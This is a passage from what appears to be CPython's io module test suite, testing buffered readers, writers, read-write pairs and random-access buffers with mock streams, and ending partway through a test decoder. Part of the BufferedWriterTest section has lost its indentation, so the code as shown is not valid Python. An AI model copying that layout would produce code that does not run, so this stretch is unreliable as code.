            # Write out many bytes with exactly the same number of 0's,
            # 1's... 255's. This will help us check that concurrent reading
            # doesn't duplicate or forget contents.
            N = 1000
            l = list(range(256)) * N
            random.shuffle(l)
            s = bytes(bytearray(l))
            with self.open(support.TESTFN, "wb") as f:
                f.write(s)
            with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
                bufio = self.tp(raw, 8)
                errors = []
                results = []
                def f():
                    try:
                        # Intra-buffer read then buffer-flushing read
                        for n in cycle([1, 19]):
                            s = bufio.read(n)
                            if not s:
                                break
                            # list.append() is atomic
                            results.append(s)
                    except Exception as e:
                        errors.append(e)
                        raise
                threads = [threading.Thread(target=f) for x in range(20)]
                for t in threads:
                    t.start()
                time.sleep(0.02) # yield
                for t in threads:
                    t.join()
                self.assertFalse(errors,
                                 "the following exceptions were caught: %r" % errors)
                s = b''.join(results)
                for i in range(256):
                    c = bytes(bytearray([i]))
                    self.assertEqual(s.count(c), N)
        finally:
            support.unlink(support.TESTFN)
    def test_unseekable(self):
        bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
        self.assertRaises(self.UnsupportedOperation, bufio.tell)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
        # still unseekable even after buffered data exists
        bufio.read(1)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
        self.assertRaises(self.UnsupportedOperation, bufio.tell)
    def test_misbehaved_io(self):
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertRaises(OSError, bufio.seek, 0)
        self.assertRaises(OSError, bufio.tell)
    def test_no_extraneous_read(self):
        # Issue #9550; when the raw IO object has satisfied the read request,
        # we should not issue any additional reads, otherwise it may block
        # (e.g. socket).
        bufsize = 16
        for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
            rawio = self.MockRawIO([b"x" * n])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            # Simple case: one raw read is enough to satisfy the request.
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))
            # A more complex case where two raw reads are needed to satisfy
            # the request.
            rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
    # BufferedReaderTest against the C implementation, plus C-only checks.
    tp = io.BufferedReader
    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2GB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)
    def test_initialization(self):
        # A failed re-__init__ must leave the object unusable, not crash.
        rawio = self.MockRawIO([b"abc"])
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.read)
    def test_misbehaved_io_read(self):
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading different, so that
        # checking this is not so easy.
        self.assertRaises(OSError, bufio.read, 10)
    def test_garbage_collection(self):
        # C BufferedReader objects are collected.
        # The Python version has __del__, so it ends into gc.garbage instead
        with support.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(support.TESTFN, "w+b")
            f = self.tp(rawio)
            f.f = f
            wr = weakref.ref(f)
            del f
            support.gc_collect()
        self.assertTrue(wr() is None, wr)
    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedReader"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
    # BufferedReaderTest against the pure-Python implementation.
    tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
    # writelines() must also accept arbitrary sequence types (UserList).
    sink = self.MockRawIO()
    buffered = self.tp(sink, 8)
    buffered.writelines(UserList([b'ab', b'cd', b'ef']))
    buffered.flush()
    self.assertEqual(b''.join(sink._write_stack), b'abcdef')
def test_writelines_error(self):
    # Items that are not bytes-like, and non-iterable arguments, must
    # raise TypeError.
    buffered = self.tp(self.MockRawIO(), 8)
    for bad_argument in ([1, 2, 3], None, 'abc'):
        self.assertRaises(TypeError, buffered.writelines, bad_argument)
def test_destructor(self):
    # Dropping the last reference must flush pending bytes to the
    # underlying raw stream.
    sink = self.MockRawIO()
    buffered = self.tp(sink, 8)
    buffered.write(b"abc")
    del buffered
    support.gc_collect()
    self.assertEqual(b"abc", sink._write_stack[0])
def test_truncate(self):
    # Truncate implicitly flushes the buffer.
    with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
        bufio = self.tp(raw, 8)
        bufio.write(b"abcdef")
        self.assertEqual(bufio.truncate(3), 3)
        # truncate() does not move the logical stream position.
        self.assertEqual(bufio.tell(), 6)
    with self.open(support.TESTFN, "rb", buffering=0) as f:
        # Only the first 3 bytes survive on disk.
        self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
    """Hammer a single BufferedWriter from 20 threads and verify that,
    once closed, no byte was lost or duplicated."""
    try:
        # Write out many bytes from many threads and test they were
        # all flushed.
        N = 1000
        contents = bytes(range(256)) * N
        sizes = cycle([1, 19])
        n = 0
        queue = deque()
        # Pre-split the payload into chunks of alternating sizes (1 and
        # 19) so writes interleave at odd offsets within the 8-byte buffer.
        while n < len(contents):
            size = next(sizes)
            queue.append(contents[n:n+size])
            n += size
        del contents
        # We use a real file object because it allows us to
        # exercise situations where the GIL is released before
        # writing the buffer to the raw streams. This is in addition
        # to concurrency issues due to switching threads in the middle
        # of Python code.
        with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
            bufio = self.tp(raw, 8)
            errors = []
            def f():
                # Each worker drains the shared deque until empty.
                try:
                    while True:
                        try:
                            s = queue.popleft()
                        except IndexError:
                            return
                        bufio.write(s)
                except Exception as e:
                    errors.append(e)
                    raise
            threads = [threading.Thread(target=f) for x in range(20)]
            for t in threads:
                t.start()
            time.sleep(0.02) # yield
            for t in threads:
                t.join()
            self.assertFalse(errors,
                "the following exceptions were caught: %r" % errors)
            bufio.close()
        with self.open(support.TESTFN, "rb") as f:
            s = f.read()
            # Every byte value 0..255 must appear exactly N times.
            for i in range(256):
                self.assertEqual(s.count(bytes([i])), N)
    finally:
        support.unlink(support.TESTFN)
def test_misbehaved_io(self):
    # A raw stream that misreports seek/tell must surface OSError
    # through the buffered layer instead of corrupting state.
    broken = self.MisbehavedRawIO()
    buffered = self.tp(broken, 5)
    self.assertRaises(OSError, buffered.seek, 0)
    self.assertRaises(OSError, buffered.tell)
    self.assertRaises(OSError, buffered.write, b"abcdef")
def test_max_buffer_size_removal(self):
    # The old max_buffer_size third argument is gone; passing an extra
    # positional argument must raise TypeError.
    with self.assertRaises(TypeError):
        self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
    # If flushing during close() fails, the exception must propagate,
    # but the stream must still end up marked closed.
    raw = self.MockRawIO()
    def failing_write(data):
        raise OSError()
    raw.write = failing_write
    buffered = self.tp(raw)
    buffered.write(b'spam')
    self.assertRaises(OSError, buffered.close)  # exception not swallowed
    self.assertTrue(buffered.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
    """Run the BufferedWriterTest suite against the C implementation,
    plus checks specific to the C accelerator (GC, huge sizes)."""
    tp = io.BufferedWriter

    def test_constructor(self):
        BufferedWriterTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2GB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        # Invalid buffer sizes must fail, and after a failed re-__init__
        # the object must refuse further writes.
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.write, b"def")

    def test_garbage_collection(self):
        # C BufferedWriter objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends into gc.garbage instead
        with support.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(support.TESTFN, "w+b")
            f = self.tp(rawio)
            f.write(b"123xxx")
            f.x = f  # create a reference cycle so only the GC can reclaim it
            wr = weakref.ref(f)
            del f
            support.gc_collect()
            self.assertTrue(wr() is None, wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"123xxx")

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedWriter"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
    # Run the BufferedWriterTest suite against the pure-Python implementation.
    tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
    """Tests for BufferedRWPair: a reader and a writer glued together.

    Subclasses supply ``tp`` plus the mock raw streams; reads are
    delegated to the first constructor argument and writes to the second.
    """

    def test_constructor(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)

    def test_uninitialized(self):
        # An object from __new__ without __init__ must fail cleanly, and
        # become usable once __init__ is finally called.
        pair = self.tp.__new__(self.tp)
        del pair
        pair = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.read, 0)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.write, b'')
        pair.__init__(self.MockRawIO(), self.MockRawIO())
        self.assertEqual(pair.read(0), b'')
        self.assertEqual(pair.write(b''), 0)

    def test_detach(self):
        # detach() is unsupported on a pair (there is no single raw stream).
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertRaises(self.UnsupportedOperation, pair.detach)

    def test_constructor_max_buffer_size_removal(self):
        # The removed max_buffer_size argument must raise TypeError.
        with self.assertRaises(TypeError):
            self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)

    def test_constructor_with_not_readable(self):
        class NotReadable(MockRawIO):
            def readable(self):
                return False
        self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())

    def test_constructor_with_not_writeable(self):
        class NotWriteable(MockRawIO):
            def writable(self):
                return False
        self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())

    def test_read(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertEqual(pair.read(3), b"abc")
        self.assertEqual(pair.read(1), b"d")
        self.assertEqual(pair.read(), b"ef")
        pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
        # read(None) means read to EOF, like read().
        self.assertEqual(pair.read(None), b"abc")

    def test_readlines(self):
        pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        # A hint stops reading once at least that many bytes were returned.
        self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])

    def test_read1(self):
        # .read1() is delegated to the underlying reader object, so this test
        # can be shallow.
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertEqual(pair.read1(3), b"abc")

    def test_readinto(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        data = bytearray(5)
        self.assertEqual(pair.readinto(data), 5)
        self.assertEqual(data, b"abcde")

    def test_write(self):
        w = self.MockRawIO()
        pair = self.tp(self.MockRawIO(), w)
        pair.write(b"abc")
        pair.flush()
        pair.write(b"def")
        pair.flush()
        self.assertEqual(w._write_stack, [b"abc", b"def"])

    def test_peek(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        # peek() must not consume the peeked bytes.
        self.assertTrue(pair.peek(3).startswith(b"abc"))
        self.assertEqual(pair.read(3), b"abc")

    def test_readable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.readable())

    def test_writeable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.writable())

    def test_seekable(self):
        # BufferedRWPairs are never seekable, even if their readers and writers
        # are.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.seekable())

    # .flush() is delegated to the underlying writer object and has been
    # tested in the test_write method.

    def test_close_and_closed(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)
        pair.close()
        self.assertTrue(pair.closed)

    def test_isatty(self):
        # isatty() is true if either side of the pair reports a tty.
        class SelectableIsAtty(MockRawIO):
            def __init__(self, isatty):
                MockRawIO.__init__(self)
                self._isatty = isatty
            def isatty(self):
                return self._isatty
        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
        self.assertFalse(pair.isatty())
        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
        self.assertTrue(pair.isatty())
        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())
        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())

    def test_weakref_clearing(self):
        brw = self.tp(self.MockRawIO(), self.MockRawIO())
        ref = weakref.ref(brw)
        brw = None
        ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
    # Run the BufferedRWPairTest suite against the C implementation.
    tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
    # Run the BufferedRWPairTest suite against the pure-Python implementation.
    tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
    """Tests for BufferedRandom: inherits the reader and writer suites and
    adds checks for interleaved reads/writes/seeks over one buffer."""
    read_mode = "rb+"
    write_mode = "wb+"

    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        BufferedWriterTest.test_constructor(self)

    def test_uninitialized(self):
        BufferedReaderTest.test_uninitialized(self)
        BufferedWriterTest.test_uninitialized(self)

    def test_read_and_write(self):
        raw = self.MockRawIO((b"asdf", b"ghjk"))
        rw = self.tp(raw, 8)
        self.assertEqual(b"as", rw.read(2))
        rw.write(b"ddd")
        rw.write(b"eee")
        self.assertFalse(raw._write_stack) # Buffer writes
        # Reading forces the pending writes out to the raw stream first.
        self.assertEqual(b"ghjk", rw.read())
        self.assertEqual(b"dddeee", raw._write_stack[0])

    def test_seek_and_tell(self):
        raw = self.BytesIO(b"asdfghjkl")
        rw = self.tp(raw)
        self.assertEqual(b"as", rw.read(2))
        self.assertEqual(2, rw.tell())
        rw.seek(0, 0)
        self.assertEqual(b"asdf", rw.read(4))
        rw.write(b"123f")
        rw.seek(0, 0)
        self.assertEqual(b"asdf123fl", rw.read())
        self.assertEqual(9, rw.tell())
        rw.seek(-4, 2)  # whence=2: relative to end
        self.assertEqual(5, rw.tell())
        rw.seek(2, 1)   # whence=1: relative to current position
        self.assertEqual(7, rw.tell())
        self.assertEqual(b"fl", rw.read(11))
        rw.flush()
        self.assertEqual(b"asdf123fl", raw.getvalue())
        # Non-integer offsets are rejected.
        self.assertRaises(TypeError, rw.seek, 0.0)

    def check_flush_and_read(self, read_func):
        # Shared driver: mix writes with reads performed via read_func and
        # verify flush() keeps position while resetting the read buffer.
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)
        self.assertEqual(b"ab", read_func(bufio, 2))
        bufio.write(b"12")
        self.assertEqual(b"ef", read_func(bufio, 2))
        self.assertEqual(6, bufio.tell())
        bufio.flush()
        self.assertEqual(6, bufio.tell())
        self.assertEqual(b"ghi", read_func(bufio))
        raw.seek(0, 0)
        raw.write(b"XYZ")
        # flush() resets the read buffer
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"XYZ", read_func(bufio, 3))

    def test_flush_and_read(self):
        self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))

    def test_flush_and_readinto(self):
        def _readinto(bufio, n=-1):
            # Adapt readinto() to the read_func(bufio, n) -> bytes protocol.
            b = bytearray(n if n >= 0 else 9999)
            n = bufio.readinto(b)
            return bytes(b[:n])
        self.check_flush_and_read(_readinto)

    def test_flush_and_peek(self):
        def _peek(bufio, n=-1):
            # This relies on the fact that the buffer can contain the whole
            # raw stream, otherwise peek() can return less.
            b = bufio.peek(n)
            if n != -1:
                b = b[:n]
            bufio.seek(len(b), 1)
            return b
        self.check_flush_and_read(_peek)

    def test_flush_and_write(self):
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)
        bufio.write(b"123")
        bufio.flush()
        bufio.write(b"45")
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"12345fghi", raw.getvalue())
        self.assertEqual(b"12345fghi", bufio.read())

    def test_threads(self):
        BufferedReaderTest.test_threads(self)
        BufferedWriterTest.test_threads(self)

    def test_writes_and_peek(self):
        def _peek(bufio):
            bufio.peek(1)
        self.check_writes(_peek)
        def _peek(bufio):
            # Peek after seeking backwards, then restore the position.
            pos = bufio.tell()
            bufio.seek(-1, 1)
            bufio.peek(1)
            bufio.seek(pos, 0)
        self.check_writes(_peek)

    def test_writes_and_reads(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.read(1)
        self.check_writes(_read)

    def test_writes_and_read1s(self):
        def _read1(bufio):
            bufio.seek(-1, 1)
            bufio.read1(1)
        self.check_writes(_read1)

    def test_writes_and_readintos(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.readinto(bytearray(1))
        self.check_writes(_read)

    def test_write_after_readahead(self):
        # Issue #6629: writing after the buffer was filled by readahead should
        # first rewind the raw stream.
        for overwrite_size in [1, 5]:
            raw = self.BytesIO(b"A" * 10)
            bufio = self.tp(raw, 4)
            # Trigger readahead
            self.assertEqual(bufio.read(1), b"A")
            self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if it needs so
            bufio.write(b"B" * overwrite_size)
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            # If the write size was smaller than the buffer size, flush() and
            # check that rewind happens.
            bufio.flush()
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            s = raw.getvalue()
            self.assertEqual(s,
                b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))

    def test_write_rewind_write(self):
        # Various combinations of reading / writing / seeking backwards / writing again
        def mutate(bufio, pos1, pos2):
            assert pos2 >= pos1
            # Fill the buffer
            bufio.seek(pos1)
            bufio.read(pos2 - pos1)
            bufio.write(b'\x02')
            # This writes earlier than the previous write, but still inside
            # the buffer.
            bufio.seek(pos1)
            bufio.write(b'\x01')

        b = b"\x80\x81\x82\x83\x84"
        # Exercise every (pos1, pos2) combination within the payload.
        for i in range(0, len(b)):
            for j in range(i, len(b)):
                raw = self.BytesIO(b)
                bufio = self.tp(raw, 100)
                mutate(bufio, i, j)
                bufio.flush()
                expected = bytearray(b)
                expected[j] = 2
                expected[i] = 1
                self.assertEqual(raw.getvalue(), expected,
                                 "failed result for i=%d, j=%d" % (i, j))

    def test_truncate_after_read_or_write(self):
        raw = self.BytesIO(b"A" * 10)
        bufio = self.tp(raw, 100)
        self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
        self.assertEqual(bufio.truncate(), 2)
        self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
        self.assertEqual(bufio.truncate(), 4)

    def test_misbehaved_io(self):
        BufferedReaderTest.test_misbehaved_io(self)
        BufferedWriterTest.test_misbehaved_io(self)

    def test_interleaved_read_write(self):
        # Test for issue #12213
        with self.BytesIO(b'abcdefgh') as raw:
            with self.tp(raw, 100) as f:
                f.write(b"1")
                self.assertEqual(f.read(1), b'b')
                f.write(b'2')
                self.assertEqual(f.read1(1), b'd')
                f.write(b'3')
                buf = bytearray(1)
                f.readinto(buf)
                self.assertEqual(buf, b'f')
                f.write(b'4')
                self.assertEqual(f.peek(1), b'h')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b2d3f4h')

        with self.BytesIO(b'abc') as raw:
            with self.tp(raw, 100) as f:
                self.assertEqual(f.read(1), b'a')
                f.write(b"2")
                self.assertEqual(f.read(1), b'c')
                f.flush()
                self.assertEqual(raw.getvalue(), b'a2c')

    def test_interleaved_readline_write(self):
        with self.BytesIO(b'ab\ncdef\ng\n') as raw:
            with self.tp(raw) as f:
                f.write(b'1')
                self.assertEqual(f.readline(), b'b\n')
                f.write(b'2')
                self.assertEqual(f.readline(), b'def\n')
                f.write(b'3')
                self.assertEqual(f.readline(), b'\n')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')

    # You can't construct a BufferedRandom over a non-seekable stream.
    test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
    """Run the BufferedRandomTest suite against the C implementation."""
    tp = io.BufferedRandom

    def test_constructor(self):
        BufferedRandomTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2GB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                bufio.__init__, rawio, sys.maxsize)

    def test_garbage_collection(self):
        # Reuse the reader- and writer-side GC checks.
        CBufferedReaderTest.test_garbage_collection(self)
        CBufferedWriterTest.test_garbage_collection(self)

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedRandom"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
    # Run the BufferedRandomTest suite against the pure-Python implementation.
    tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
    """
    For testing seek/tell behavior with a stateful, buffering decoder.

    Input is a sequence of words. Words may be fixed-length (length set
    by input) or variable-length (period-terminated). In variable-length
    mode, extra periods are ignored. Possible words are:
      - 'i' followed by a number sets the input length, I (maximum 99).
        When I is set to 0, words are space-terminated.
      - 'o' followed by a number sets the output length, O (maximum 99).
      - Any other word is converted into a word followed by a period on
        the output. The output word consists of the input word truncated
        or padded out with hyphens to make its length equal to O. If O
        is 0, the word is output verbatim without truncating or padding.
    I and O are initially set to 1. When I changes, any buffered input is
    re-scanned according to the new I. EOF also terminates the last word.
    """

    # Flipped on by tests that register 'test_decoder'; off by default so
    # this codec does not leak into unrelated tests.
    codecEnabled = False

    def __init__(self, errors='strict'):
        codecs.IncrementalDecoder.__init__(self, errors)
        self.reset()

    def __repr__(self):
        return '<SID %x>' % id(self)

    def reset(self):
        # I (input length) and O (output length) both start at 1, with no
        # pending bytes.
        self.i = 1
        self.o = 1
        self.buffer = bytearray()

    def getstate(self):
        # XOR with 1 so that a freshly reset decoder reports flags == 0.
        packed = (self.i ^ 1) * 100 + (self.o ^ 1)
        return bytes(self.buffer), packed

    def setstate(self, state):
        pending, packed = state
        self.buffer = bytearray(pending)
        high, low = divmod(packed, 100)
        self.i = high ^ 1
        self.o = low ^ 1

    def decode(self, input, final=False):
        pieces = []
        for byte in input:
            if self.i == 0:
                # Variable-length mode: words end at a period; empty words
                # (extra periods) are ignored.
                if byte != ord('.'):
                    self.buffer.append(byte)
                elif self.buffer:
                    pieces.append(self.process_word())
            else:
                # Fixed-length mode: emit once self.i bytes are buffered.
                self.buffer.append(byte)
                if len(self.buffer) == self.i:
                    pieces.append(self.process_word())
        if final and self.buffer:
            # EOF flushes whatever is left as a final word.
            pieces.append(self.process_word())
        return ''.join(pieces)

    def process_word(self):
        # Consume the buffered word: either a control word ('i'/'o' prefix
        # updating I/O) producing no output, or a data word padded/truncated
        # to O characters and terminated with a period.
        word = self.buffer
        self.buffer = bytearray()
        if word[0] == ord('i'):
            self.i = min(99, int(word[1:] or 0)) # set input length
            return ''
        if word[0] == ord('o'):
            self.o = min(99, int(word[1:] or 0)) # set output length
            return ''
        text = word.decode('ascii')
        if len(text) < self.o:
            text += '-'*self.o # pad out with hyphens
        if self.o:
            text = text[:self.o] # truncate to output length
        return text + '.'

    @classmethod
    def lookupTestDecoder(cls, name):
        # Codec search function: answers only for 'test_decoder', and only
        # while a test has explicitly enabled this codec.
        if not (cls.codecEnabled and name == 'test_decoder'):
            return None
